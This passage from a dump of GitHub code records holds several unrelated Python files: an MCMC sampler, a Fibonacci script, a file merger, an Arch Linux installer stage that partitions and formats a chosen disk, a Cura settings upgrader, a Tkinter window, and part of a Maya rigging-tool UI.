(nsamples, ndims)), step)\n old_p = pdf(chain_x)\n rand_u = np.random.uniform(0.0, 1.0, nsamples)\n for i in range(nsamples):\n # Get new data\n new_x = chain_x + walks[i]\n new_p = pdf(new_x)\n if new_p > 0.0:\n # Only progress the chain if the proposal is valid\n if old_p > 0.0:\n acceptance = new_p / old_p\n else:\n # if the old point was out of bounds, then accept new point\n acceptance = 1.0\n if rand_u[i] < acceptance:\n chain_x = new_x\n old_p = new_p\n accept += 1\n chain[i] = chain_x\n return chain, accept\n\n\n# Uniform random walker with unequal step sizes per dimension\ndef _metropolis_uniform_multi(pdf, mins, maxs, ndims: int, nsamples: int, initial):\n chain = np.zeros((nsamples, ndims))\n chain_x = initial\n accept: int = 0\n walks = np.asarray([np.random.uniform(low=mins[i], high=maxs[i], size=nsamples)\n for i in range(ndims)]).transpose().squeeze()\n old_p = pdf(chain_x)\n rand_u = np.random.uniform(0.0, 1.0, nsamples)\n for i in range(nsamples):\n # Get new data\n new_x = chain_x + walks[i]\n new_p = pdf(new_x)\n if new_p > 0.0:\n # Only progress the chain if the proposal is valid\n if old_p > 0.0:\n acceptance = new_p / old_p\n else:\n # if the old point was out of bounds, then accept new point\n acceptance = 1.0\n if rand_u[i] < acceptance:\n chain_x = new_x\n old_p = new_p\n accept += 1\n chain[i] = chain_x\n return chain, 
accept\n","repo_name":"fentonscode/xEHM","sub_path":"src/xehm/sampling/metropolis_sampler.py","file_name":"metropolis_sampler.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33063581136","text":"seq_len=int(input(\"Enter the sequence length : \"))\r\na=0;b=1;c=a+b;\r\nprint(a,end=\",\")\r\nprint(b,end=\",\")\r\nfor i in range(seq_len-2):\r\n if i!=seq_len-3:\r\n print(c,end=\",\")\r\n else :\r\n print(c,end=\"\")\r\n a=b\r\n b=c\r\n c=a+b\r\n","repo_name":"AmitabhKotha/MyCaptainPython","sub_path":"fibonnaciIteration.py","file_name":"fibonnaciIteration.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"118809574","text":"\"\"\"\nMerge files that are divided out by range number into a single file.\n\nAuthor: Hayden Elza\nEmail: hayden.elza@gmail.com\nCreated: 2019-07-26\n\"\"\"\n\n\nimport os\n\n\n# Data Sources\nwd = os.path.dirname(os.getcwd())\nwest = os.path.join(wd, 'data/edited/TownshipsWest/')\neast = os.path.join(wd, 'data/edited/TownshipsEast/')\nsources = [west,east]\n\noutput = os.path.join(wd, 'data/edited/township_descriptions.txt')\n\n# Open output\nwith open(output, 'w') as outfile:\n\n\t# Iterate through sources\n\tfor source in sources:\n\n\t\t# Walk directory\n\t\tfor dir_name, subdirs, files in os.walk(source):\n\t\t\tprint('Found directory: %s' % dir_name)\n\n\t\t\t# Read each line for each file and write to output file\n\t\t\tfor file in files:\n\t\t\t\tprint('\\t%s' % file)\n\t\t\t\twith open(os.path.join(dir_name, file)) as infile:\n\t\t\t\t\tfor line in infile:\n\t\t\t\t\t\toutfile.write(line)\n","repo_name":"mdnoone/PLSS","sub_path":"scripts/1_merge_files.py","file_name":"1_merge_files.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20650759221","text":"# -- Sarch installer\n# -- WARNING: Works only for x64 EFI based systems.\n\nimport os\n\nkeymap = \"\"\ninstall_disk = \"\"\n\ndef InternetCheck():\n response = os.system(\"ping -c 1 google.com > /dev/null\")\n if response == 0: return 1\n else: return 0\n\ndef launch_cfdisk():\n os.system(\"cfdisk \" + install_disk)\n if (input(\"Did you partition your disks correctly? 
(Y/n)\") == \"n\"):\n launch_cfdisk()\n\ndef format_mount_disks():\n # Prepare partitions for mounting\n os.system(\"mkfs.fat -F32 \" + install_disk + \"1\")\n os.system(\"mkswap \" + install_disk + \"2\")\n os.system(\"mkfs.ext4 \" + install_disk + \"3\")\n\n # Mount all partitions aside from /dev/sd*1\n os.system(\"mount \" + install_disk + \"3 /mnt\")\n os.system(\"swapon \" + install_disk + \"2\")\n\n# -- Entry point\n\nprint(\"--- WARNING: This installer will only work with x64 EFI based systems\")\n\nif (InternetCheck() != 1):\n print(\"Installation Failed: You're not connected to the internet!\")\n quit()\n\nkeymap = input(\"Enter your keymap: \")\nos.system(\"loadkeys \" + keymap)\nos.system(\"timedatectl set-ntp true\")\nos.system(\"lsblk\")\ninstall_disk = input(\"Enter the disk you want to install Sarch to: \")\ninput(\"Press any key to launch cfdisk on: \" + install_disk)\nlaunch_cfdisk()\nformat_mount_disks()\nos.system(\"pacstrap /mnt base linux linux-firmware nano git python3\") # install linux base system\nos.system(\"cp install_stage_2.py /mnt/stage_2.py\")\nos.system(\"genfstab -U /mnt >> /mnt/etc/fstab && clear\")\nprint(\"WARNING: You are now chrooted into the new mount point, run 'python3 stage_2.py'\")\nos.system(\"arch-chroot /mnt\")\n","repo_name":"MrG98XIL/Arch-Installer-Test","sub_path":"install_stage_1.py","file_name":"install_stage_1.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26784491750","text":"import configparser #To parse preference files.\nimport io #To serialise the preference files afterwards.\nfrom typing import Dict, List, Tuple\n\nfrom UM.VersionUpgrade import VersionUpgrade #We're inheriting from this.\n\n_renamed_settings = {\n \"infill_hollow\": \"infill_support_enabled\"\n} # type: Dict[str, str]\n\n## Upgrades configurations from the state they were in at version 3.3 to the\n# state they should be in at version 3.4.\nclass VersionUpgrade33to34(VersionUpgrade):\n ## Gets the version number from a CFG file in Uranium's 3.3 format.\n #\n # Since the format may change, this is implemented for the 3.3 format only\n # and needs to be included in the version upgrade system rather than\n # globally in Uranium.\n #\n # \\param serialised The serialised form of a CFG file.\n # \\return The version number stored in the CFG file.\n # \\raises ValueError The format of the version number in the file is\n # incorrect.\n # \\raises KeyError The format of the file is incorrect.\n def getCfgVersion(self, serialised: str) -> int:\n parser = configparser.ConfigParser(interpolation = None)\n parser.read_string(serialised)\n format_version = int(parser.get(\"general\", \"version\")) #Explicitly give an exception when this fails. 
That means that the file format is not recognised.\n setting_version = int(parser.get(\"metadata\", \"setting_version\", fallback = \"0\"))\n return format_version * 1000000 + setting_version\n\n ## Upgrades instance containers to have the new version\n # number.\n def upgradeInstanceContainer(self, serialized: str, filename: str) -> Tuple[List[str], List[str]]:\n parser = configparser.ConfigParser(interpolation = None)\n parser.read_string(serialized)\n\n # Update version number.\n parser[\"general\"][\"version\"] = \"4\"\n\n if \"values\" in parser:\n #If infill_hollow was enabled and the overhang angle was adjusted, copy that overhang angle to the new infill support angle.\n if \"infill_hollow\" in parser[\"values\"] and parser[\"values\"][\"infill_hollow\"] and \"support_angle\" in parser[\"values\"]:\n parser[\"values\"][\"infill_support_angle\"] = parser[\"values\"][\"support_angle\"]\n\n #Renamed settings.\n for original, replacement in _renamed_settings.items():\n if original in parser[\"values\"]:\n parser[\"values\"][replacement] = parser[\"values\"][original]\n del parser[\"values\"][original]\n\n result = io.StringIO()\n parser.write(result)\n return [filename], [result.getvalue()]","repo_name":"Szu-Chi/3d-printing-with-moveo","sub_path":"Cura/Cura/plugins/VersionUpgrade/VersionUpgrade33to34/VersionUpgrade33to34.py","file_name":"VersionUpgrade33to34.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"73087977320","text":"from tkinter import *\nfrom threading import Thread\n\nfrom .home import Home\n\n\nclass InitUi(Thread):\n def __init__(self, messages):\n Thread.__init__(self)\n self.root = Tk()\n self.root.title(\"All is found\")\n self.frame1 = Frame()\n self.frame1.pack(side=LEFT, fill=Y)\n self.frame1.config(bg=\"skyblue\")\n self.home = Home(self.frame1, messages)\n self.refresh_message = self.home.refresh_message\n\n def run(self):\n self.root.mainloop()\n","repo_name":"karnkittik/all-is-found","sub_path":"front_end/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1306328835","text":"import pymel.core as pm\nimport os\nfrom functools import partial\n\nimport System.utils as utils\n\nreload(utils)\n\nclass Blueprint_UI:\n \n def __init__(self):\n \n self.directory = '%s/nwModularRiggingTool' %pm.internalVar(userScriptDir = True)\n self.moduleInstance = None\n \n self.DeleteSymmetryMoveExpressions()\n \n # Store UI elements in a dictionary\n self.UIElements = {}\n \n # Refresh all UI\n if pm.window(\"blueprint_UI_window\", exists = True):\n pm.deleteUI(\"blueprint_UI_window\")\n\n if pm.window(\"mirrorModule_UI_window\", exists = True):\n pm.deleteUI(\"mirrorModule_UI_window\")\n \n if pm.window(\"groupSelected_UI_window\", exists = True):\n pm.deleteUI(\"groupSelected_UI_window\")\n \n if pm.window(\"saveTemplate_UI_window\", exists = True):\n pm.deleteUI(\"saveTemplate_UI_window\")\n \n \n \n windowWidth = 400\n windowHeight = 748\n \n self.UIElements[\"window\"] = pm.window(\"blueprint_UI_window\", width = windowWidth, height = windowHeight, title = \"Blueprint Module UI\", sizeable = False)\n \n self.UIElements[\"topLevelColumn\"] = pm.columnLayout(adjustableColumn = True, columnAlign = \"center\", parent = self.UIElements[\"window\"])\n \n # Setup tab\n tabHeight = 630\n self.UIElements[\"tabs\"] = pm.tabLayout(width = windowWidth, 
height = tabHeight, innerMarginWidth = 5, innerMarginHeight = 5, parent = self.UIElements[\"topLevelColumn\"])\n \n tabWidth = pm.tabLayout(self.UIElements[\"tabs\"], query = True, width = True)\n self.scrollWidth = tabWidth - 40\n \n self.InitializeModuleTab(tabWidth, tabHeight)\n \n # Template tab\n self.InitializeTemplatesTab(tabHeight, tabWidth)\n \n \n # Controls tab\n self.InitializeControlsTab(tabHeight, tabWidth)\n \n \n scenePublished = pm.objExists(\"Scene_Published\")\n blueprintsUnlocked = not pm.objExists(\"Blueprints_Locked\") and not scenePublished\n controlsUnlocked = not blueprintsUnlocked and not pm.objExists(\"Controls_Locked\")\n \n \n \n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, tabLabelIndex = ([1, 'Modules'], [2, 'Templates'], [3, 'Controls']), enable = blueprintsUnlocked )\n \n \n self.UIElements[\"lockPublishColumn\"] = pm.columnLayout(adjustableColumn = True, columnAlign = 'center', rowSpacing = 3, parent = self.UIElements[\"topLevelColumn\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"lockPublishColumn\"])\n \n self.UIElements[\"lockBtn_rowLayout\"] = pm.rowLayout(numberOfColumns = 2, parent = self.UIElements[\"lockPublishColumn\"])\n \n self.UIElements[\"lockBlueprintsBtn\"] = pm.iconTextButton(style='iconOnly', image = \"%s/Icons/_lockBlueprints.png\" %os.environ[\"RIGGING_TOOL_ROOT\"], enable = blueprintsUnlocked, command = self.LockBlueprint, parent = self.UIElements[\"lockBtn_rowLayout\"])\n self.UIElements[\"lockControlsBtn\"] = pm.iconTextButton(style='iconOnly', image = \"%s/Icons/_lockControls.png\" %os.environ[\"RIGGING_TOOL_ROOT\"], enable = controlsUnlocked, command = self.LockControls, parent = self.UIElements[\"lockBtn_rowLayout\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"lockPublishColumn\"])\n \n self.UIElements[\"publishBtn\"] = pm.iconTextButton(style='iconOnly', image = \"%s/Icons/_publishCharacter.png\" %os.environ[\"RIGGING_TOOL_ROOT\"], enable = not blueprintsUnlocked and not controlsUnlocked and not scenePublished, command = self.Publish, parent = self.UIElements[\"lockPublishColumn\"])\n \n \n \n # Display window\n pm.showWindow(self.UIElements[\"window\"])\n \n \n self.CreateScriptJob()\n \n \n \n def CreateScriptJob(self):\n self.jobNum = pm.scriptJob(event = [\"SelectionChanged\", self.ModifySelected], runOnce = True, parent = self.UIElements[\"window\"])\n \n \n \n def DeleteScriptJob(self):\n pm.scriptJob(kill = self.jobNum)\n \n \n def InitializeModuleTab(self, _tabWidth, _tabHeight):\n \n moduleSpecific_scrollHeight = 170\n scrollHeight = _tabHeight - moduleSpecific_scrollHeight - 163\n \n \n self.UIElements[\"moduleColumn\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 3, parent = self.UIElements[\"tabs\"])\n \n self.UIElements[\"moduleFrameLayout\"] = pm.frameLayout(height = scrollHeight, collapsable = False, borderVisible = False, labelVisible = False, parent = self.UIElements[\"moduleColumn\"])\n \n self.UIElements[\"moduleList_scroll\"] = pm.scrollLayout(horizontalScrollBarThickness = 0, parent = self.UIElements[\"moduleFrameLayout\"])\n \n self.UIElements[\"moduleList_column\"] = pm.columnLayout(columnWidth = self.scrollWidth, adjustableColumn = True, rowSpacing = 2, parent = self.UIElements[\"moduleList_scroll\"])\n \n \n # first separator\n pm.separator(style = 'in', parent = self.UIElements[\"moduleList_column\"])\n \n # Module buttons\n for module in utils.FindAllModules(\"Modules/Blueprint\"):\n self.CreateModuleInstallButton(module)\n pm.separator(style = 'in', 
parent = self.UIElements[\"moduleList_column\"])\n \n \n # Module manipulation buttons\n pm.separator(style = 'in', parent = self.UIElements[\"moduleColumn\"])\n \n self.UIElements[\"moduleName_row\"] = pm.rowLayout(numberOfColumns = 2, columnAttach = (1, 'right', 0), columnWidth = [(1, 80)], adjustableColumn = 2, parent = self.UIElements[\"moduleColumn\"])\n pm.text(label = \"Module Name :\", parent = self.UIElements[\"moduleName_row\"])\n self.UIElements[\"moduleName\"] = pm.textField(enable = False, alwaysInvokeEnterCommandOnReturn = True, parent = self.UIElements[\"moduleName_row\"], enterCommand = self.RenameModule)\n \n \n columnWidth = (_tabWidth - 20) / 3\n \n self.UIElements[\"moduleButtons_rowColumns\"] = pm.rowColumnLayout(numberOfColumns = 3, rowOffset = [(1, 'both', 2), (2, 'both', 2), (3, 'both', 2)], columnAttach = [(1, 'both', 3), (2, 'both', 3), (3, 'both', 3)], columnWidth = [(1, columnWidth), (2, columnWidth), (3, columnWidth)], parent = self.UIElements[\"moduleColumn\"])\n \n # First row of buttons\n self.UIElements[\"rehookBtn\"] = pm.button(enable = False, label = \"Re-hook\", command = self.RehookModule_setup, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"snapRootBtn\"] = pm.button(enable = False, label = \"Snap Root > Hook\", command = self.SnapRootToHook, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"constrainBtn\"] = pm.button(enable = False, label = \"Constrain Root > Hook\", command = self.ConstrainRootToHook, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n \n # Second row of buttons\n self.UIElements[\"groupSelectedBtn\"] = pm.button(label = \"Group Selected\", command = self.GroupSelected, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"ungroupBtn\"] = pm.button(enable = False, label = \"Ungroup\", command = self.UngroupSelected, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"mirrorModuleBtn\"] = pm.button(enable = False, label = \"Mirror Module\", command = self.MirrorModule, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n \n # Third row of buttons\n self.UIElements[\"duplicateModuleBtn\"] = pm.button(enable = True, label = \"Duplicate Module\", command = self.DuplicateModule, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"deleteModuleBtn\"] = pm.button(enable = False, label = \"Delete Module\", command = self.DeleteModule, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"symmetryMoveCheckBox\"] = pm.checkBox(enable = True, label = \"Symmetry Move\", onCommand = self.SetupSymmetryMoveExpressions_CheckBox, offCommand = self.DeleteSymmetryMoveExpressions, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"moduleColumn\"])\n \n \n \n self.UIElements[\"moduleSpecificRowColumnLayout\"] = pm.rowColumnLayout(numberOfRows = 1, rowAttach = [1, 'both', 0], rowHeight = [1, moduleSpecific_scrollHeight], parent = self.UIElements[\"moduleColumn\"])\n self.UIElements[\"modueSpecific_scroll\"] = pm.scrollLayout(width = _tabWidth - 8, horizontalScrollBarThickness = 0, parent = self.UIElements[\"moduleSpecificRowColumnLayout\"])\n self.UIElements[\"moduleSpecific_column\"] = pm.columnLayout(columnWidth = self.scrollWidth, columnAttach = ['both', 5], rowSpacing = 2, parent = self.UIElements[\"modueSpecific_scroll\"])\n \n \n pm.separator(style = 'in', parent = self.UIElements[\"moduleColumn\"])\n \n \n def 
InitializeTemplatesTab(self, _tabHeight, _tabWidth):\n \n self.UIElements[\"templatesColumn\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 3, columnAttach = [\"both\", 0], parent = self.UIElements[\"tabs\"])\n \n self.UIElements[\"templatesFrame\"] = pm.frameLayout(height = (_tabHeight - 104), collapsable = False, borderVisible = False, labelVisible = False, parent = self.UIElements[\"templatesColumn\"])\n self.UIElements[\"templateList_scroll\"] = pm.scrollLayout(horizontalScrollBarThickness = 0, parent = self.UIElements[\"templatesFrame\"])\n self.UIElements[\"templateList_column\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 2, parent = self.UIElements[\"templateList_scroll\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"templateList_column\"])\n \n for template in utils.FindAllMayaFiles(\"/Templates\"):\n \n #templateAndPath = \"%s/Templates/%s.ma\" %(self.directory, template)\n templateAndPath = \"%s/Templates/%s.ma\" %(os.environ[\"RIGGING_TOOL_ROOT\"], template)\n self.CreateTemplateInstallButton(templateAndPath)\n \n \n pm.separator(style = 'in', parent = self.UIElements[\"templatesColumn\"])\n \n self.UIElements[\"prepareTemplateBtn\"] = pm.button(label = \"Prepare for Template\", command = self.PrepareForTemplate, parent = self.UIElements[\"templatesColumn\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"templatesColumn\"])\n \n self.UIElements[\"saveCurrentBtn\"] = pm.button(label = \"Save Current as Template\", command = self.SaveCurrentAsTemplate, parent = self.UIElements[\"templatesColumn\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"templatesColumn\"])\n \n \n def InitializeControlsTab(self, _tabHeight, _tabWidth):\n \n self.UIElements[\"controlsColumn\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 3, columnAttach = [\"both\", 0], parent = self.UIElements[\"tabs\"])\n \n self.UIElements[\"controlsFrame\"] = pm.frameLayout(height = (_tabHeight - 104), collapsable = False, borderVisible = False, labelVisible = False, parent = self.UIElements[\"controlsColumn\"])\n self.UIElements[\"controlsList_scroll\"] = pm.scrollLayout(horizontalScrollBarThickness = 0, parent = self.UIElements[\"controlsFrame\"])\n self.UIElements[\"controlsList_column\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 2, parent = self.UIElements[\"controlsList_scroll\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"controlsList_column\"])\n \n self.UIElements[\"controlsTextScrollList\"] = pm.textScrollList(parent = self.UIElements[\"controlsList_column\"])\n \n \n def CreateModuleInstallButton(self, _module):\n \n mod = __import__(\"Blueprint.%s\" %_module, (), (), [_module])\n reload(mod)\n \n title = mod.TITLE\n description = mod.DESCRIPTION\n icon = mod.ICON\n \n # Create UI\n buttonSize = 64\n row = pm.rowLayout(numberOfColumns = 2, columnWidth = ([1, buttonSize]), adjustableColumn = 2, columnAttach = ([1, 'both', 0], [2, 'both', 5]), parent = self.UIElements[\"moduleList_column\"])\n \n self.UIElements[\"module_button_%s\" %_module] = pm.symbolButton(width = buttonSize, height = buttonSize, image = icon, command = partial(self.InstallModule, _module), parent = row)\n \n textColumn = pm.columnLayout(columnAlign = \"center\", rowSpacing = 5, parent = row)\n pm.text(align = \"center\", width = self.scrollWidth - buttonSize - 16, label = title, parent = textColumn)\n \n pm.scrollField(text = description, editable = False, width = self.scrollWidth - buttonSize - 16, height = buttonSize - 16, wordWrap = 
True, parent = textColumn)\n \n \n def CreateTemplateInstallButton(self, _templateAndPath):\n buttonSize = 64\n \n templateDescriptionFile = \"%s.txt\" %_templateAndPath.partition(\".ma\")[0]\n \n with open(templateDescriptionFile, 'r') as file:\n \n title = file.readline()[0:-1]\n description = file.readline()[0:-1]\n icon = file.readline()[0:-1]\n \n row = pm.rowLayout(width = self.scrollWidth, numberOfColumns = 2, columnWidth = ([1, buttonSize], [2, self.scrollWidth - buttonSize]), adjustableColumn = 2, columnAttach = ([1, \"both\", 0], [2, \"both\", 5]), parent = self.UIElements[\"templateList_column\"])\n self.UIElements[\"template_button_%s\" %_templateAndPath] = pm.symbolButton(width = buttonSize, height = buttonSize, image = icon, command = partial(self.InstallTemplate, _templateAndPath), parent = row)\n \n textColumn = pm.columnLayout(columnAlign = \"center\", parent = row)\n pm.text(align = \"center\", width = self.scrollWidth - buttonSize - 16, label = title, parent = textColumn)\n pm.scrollField(text = description, editable = False, width = self.scrollWidth - buttonSize - 16, height = buttonSize - 16, wordWrap = True, parent = textColumn)\n \n pm.separator(style = \"in\", parent = self.UIElements[\"templateList_column\"])\n \n \n def InstallModule(self, _module, *args):\n \n basename = \"instance_\"\n \n # Set namespace to root and list all namespaces in scene\n pm.namespace(setNamespace = ':')\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n \n # Find our module namespace\n for i in range(len(namespaces)):\n if namespaces[i].find(\"__\") != -1:\n namespaces[i] = namespaces[i].rpartition(\"__\")[2]\n \n \n newSuffix = utils.FindHighestTrailingNumber(namespaces, basename) + 1\n \n userSpecName = basename + str(newSuffix)\n \n \n hookObj = self.FindHookObjectFromSelection()\n \n \n # Import our module\n mod = __import__(\"Blueprint.%s\" %_module, (), (), [_module])\n reload(mod)\n \n moduleClass = getattr(mod, mod.CLASS_NAME)\n moduleInstance = moduleClass(userSpecName, hookObj)\n moduleInstance.Install()\n \n # After installation of module, select module transform with move tool\n moduleTransform = \"%s__%s:module_transform\" %(mod.CLASS_NAME, userSpecName)\n pm.select(moduleTransform, replace = True)\n pm.setToolTo(\"moveSuperContext\")\n \n \n def IsRootTransformInstalled(self):\n pm.namespace(setNamespace = \":\")\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n for namespace in namespaces:\n if namespace.find(\"RootTransform__\") == 0:\n return True\n \n return False\n \n def LockBlueprint(self, *args):\n \n # Recommend creation of root transform if not already implemented\n if not self.IsRootTransformInstalled():\n result = pm.confirmDialog(messageAlign = \"center\", title = \"Lock Blueprints\", message = \"We have detected that you don't have a root transform (global transform). \\nWould you like to go back and edit your blueprint setup? \\n\\n(It is recommended that all rigs have at least one global control module).\", button = [\"Yes\", \"No\"], defaultButton = \"Yes\", dismissString = \"Yes\")\n \n if result == \"Yes\":\n return\n \n \n # Give user warning that locking is permanent\n result = pm.confirmDialog(messageAlign = 'center', title = 'Lock Blueprints', button = ['Accept', 'Cancel'], defaultButton = 'Accept', cancelButton = 'Cancel', dismissString = 'Cancel', message = \"The action of locking a character will convert the current blueprint modules to joints. \\nThis action cannot be undone. 
\\nModifications to the blueprint system cannot be made after this point. \\n\\nDo you wish to continue?\")\n \n if result != 'Accept':\n return\n \n # Clear scene of script jobs\n self.DeleteSymmetryMoveExpressions()\n pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], edit = True, value = False)\n self.DeleteScriptJob()\n \n \n moduleInfo = [] # Store (module, userSpecifiedName) pairs\n \n # List all namespaces in scene from root\n pm.namespace(setNamespace = ':')\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n moduleNameInfo = utils.FindAllModuleNames(\"/Modules/Blueprint\")\n validModules = moduleNameInfo[0]\n validModuleNames = moduleNameInfo[1]\n \n # Search scene for valid namespaces\n for n in namespaces:\n splitString = n.partition('__')\n \n if splitString[1] != '':\n \n module = splitString[0]\n userSpecifiedName = splitString[2]\n \n # Add valid modules\n if module in validModuleNames:\n index = validModuleNames.index(module)\n moduleInfo.append([validModules[index], userSpecifiedName])\n \n \n # Abort locking if no blueprints available\n if len(moduleInfo) == 0:\n pm.confirmDialog(messageAlign = 'center', title = 'Lock Blueprints', message = \"There appear to be no blueprint \\ninstances in the current scene. \\n\\nAborting lock.\", button = [\"Accept\"], defaultButton = \"Accept\")\n return\n \n \n # Lock phase 1\n moduleInstances = []\n for module in moduleInfo:\n mod = __import__(\"Blueprint.%s\" %module[0], {}, {}, [module[0]])\n reload(mod)\n \n moduleClass = getattr(mod, mod.CLASS_NAME)\n moduleInst = moduleClass(module[1], None)\n \n moduleInf = moduleInst.Lock_phase1()\n moduleInstances.append((moduleInst, moduleInf))\n \n \n # Lock phase 2\n for module in moduleInstances:\n module[0].Lock_phase2(module[1])\n \n \n # Lock phase 3\n for module in moduleInstances:\n hookObject = module[1][4]\n module[0].Lock_phase3(hookObject)\n \n \n # Blueprints completely locked\n sceneLockedLocator = pm.spaceLocator(name = \"Blueprints_Locked\")\n pm.setAttr(\"%s.visibility\" %sceneLockedLocator, 0)\n pm.lockNode(sceneLockedLocator, lock = True, lockUnpublished = True)\n \n # Force update scene\n pm.select(clear = True)\n self.ModifySelected()\n \n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, selectTabIndex = 3)\n pm.columnLayout(self.UIElements[\"moduleColumn\"], edit = True, enable = False)\n pm.columnLayout(self.UIElements[\"templatesColumn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockBlueprintsBtn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockControlsBtn\"], edit = True, enable = True)\n pm.iconTextButton(self.UIElements[\"publishBtn\"], edit = True, enable = False)\n \n \n def LockControls(self, *args):\n \n # Controls completely locked\n sceneLockedLocator = pm.spaceLocator(name = \"Controls_Locked\")\n pm.setAttr(\"%s.visibility\" %sceneLockedLocator, 0)\n pm.lockNode(sceneLockedLocator, lock = True, lockUnpublished = True)\n \n # Force update scene\n pm.select(clear = True)\n self.ModifySelected()\n \n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, selectTabIndex = 1)\n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockBlueprintsBtn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockControlsBtn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"publishBtn\"], edit = True, enable = True)\n \n \n def ModifySelected(self, *args):\n \n # Only proceed if the scene haven't been locked 
down\n if not pm.objExists(\"Blueprints_Locked\"):\n \n if pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], query = True, value = True):\n self.DeleteSymmetryMoveExpressions()\n self.SetupSymmetryMoveExpressions()\n \n \n selectedNodes = pm.ls(selection = True)\n \n if len(selectedNodes) <= 1:\n self.moduleInstance = None\n selectedModuleNamespace = None\n currentModuleFile = None\n \n pm.button(self.UIElements[\"ungroupBtn\"], edit = True, enable = False)\n pm.button(self.UIElements[\"mirrorModuleBtn\"], edit = True, enable = False)\n \n if len(selectedNodes) == 1:\n lastSelected = selectedNodes[0]\n \n # Enable ungroup button if selected node is a group node\n if lastSelected.find(\"Group__\") == 0:\n pm.button(self.UIElements[\"ungroupBtn\"], edit = True, enable = True)\n pm.button(self.UIElements[\"mirrorModuleBtn\"], edit = True, enable = True, label = \"Mirror Group\")\n \n namespaceAndNode = utils.StripLeadingNamespace(lastSelected)\n \n if namespaceAndNode != None:\n namespace = namespaceAndNode[0]\n \n moduleNameInfo = utils.FindAllModuleNames(\"/Modules/Blueprint\")\n validModules = moduleNameInfo[0]\n validModuleNames = moduleNameInfo[1]\n \n index = 0\n for moduleName in validModuleNames:\n moduleNameIncSuffix = \"%s__\" %moduleName\n \n if namespace.find(moduleNameIncSuffix) == 0:\n currentModuleFile = validModules[index]\n selectedModuleNamespace = namespace\n break\n \n index += 1\n \n controlEnable = False\n userSpecifiedName = ''\n constrainCommand = self.ConstrainRootToHook\n constrainLabel = \"Constrain Root > Hook\"\n \n if selectedModuleNamespace != None:\n controlEnable = True\n userSpecifiedName = selectedModuleNamespace.partition('__')[2]\n \n \n mod = __import__(\"Blueprint.%s\" %currentModuleFile, {}, {}, [currentModuleFile])\n reload(mod)\n \n moduleClass = getattr(mod, mod.CLASS_NAME)\n self.moduleInstance = moduleClass(userSpecifiedName, None)\n \n \n pm.button(self.UIElements[\"mirrorModuleBtn\"], edit = True, enable = True, label = \"Mirror Module\")\n \n if self.moduleInstance.IsRootConstrained():\n constrainCommand = self.UnconstrainRootFromHook\n constrainLabel = \"Unconstrain Root\"\n \n \n pm.button(self.UIElements[\"rehookBtn\"], edit = True, enable = controlEnable)\n pm.button(self.UIElements[\"snapRootBtn\"], edit = True, enable = controlEnable)\n pm.button(self.UIElements[\"constrainBtn\"], edit = True, enable = controlEnable, label = constrainLabel, command = constrainCommand)\n \n pm.button(self.UIElements[\"deleteModuleBtn\"], edit = True, enable = controlEnable, command = self.DeleteModule)\n \n pm.textField(self.UIElements[\"moduleName\"], edit = True, enable = controlEnable, text = userSpecifiedName)\n \n \n self.CreateModuleSpecificControls()\n \n \n self.CreateScriptJob()\n \n \n \n def CreateModuleSpecificControls(self):\n \n existingControls = pm.columnLayout(self.UIElements[\"moduleSpecific_column\"], query = True, childArray = True)\n \n if existingControls != None:\n pm.deleteUI(existingControls)\n \n pm.setParent(self.UIElements[\"moduleSpecific_column\"])\n \n if self.moduleInstance != None:\n self.moduleInstance.UI(self, self.UIElements[\"moduleSpecific_column\"])\n \n \n def DeleteModule(self, *args):\n symmetryMove = pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], query = True, value = True)\n if symmetryMove:\n self.DeleteSymmetryMoveExpressions()\n \n self.moduleInstance.Delete()\n pm.select(clear = True)\n \n if symmetryMove:\n 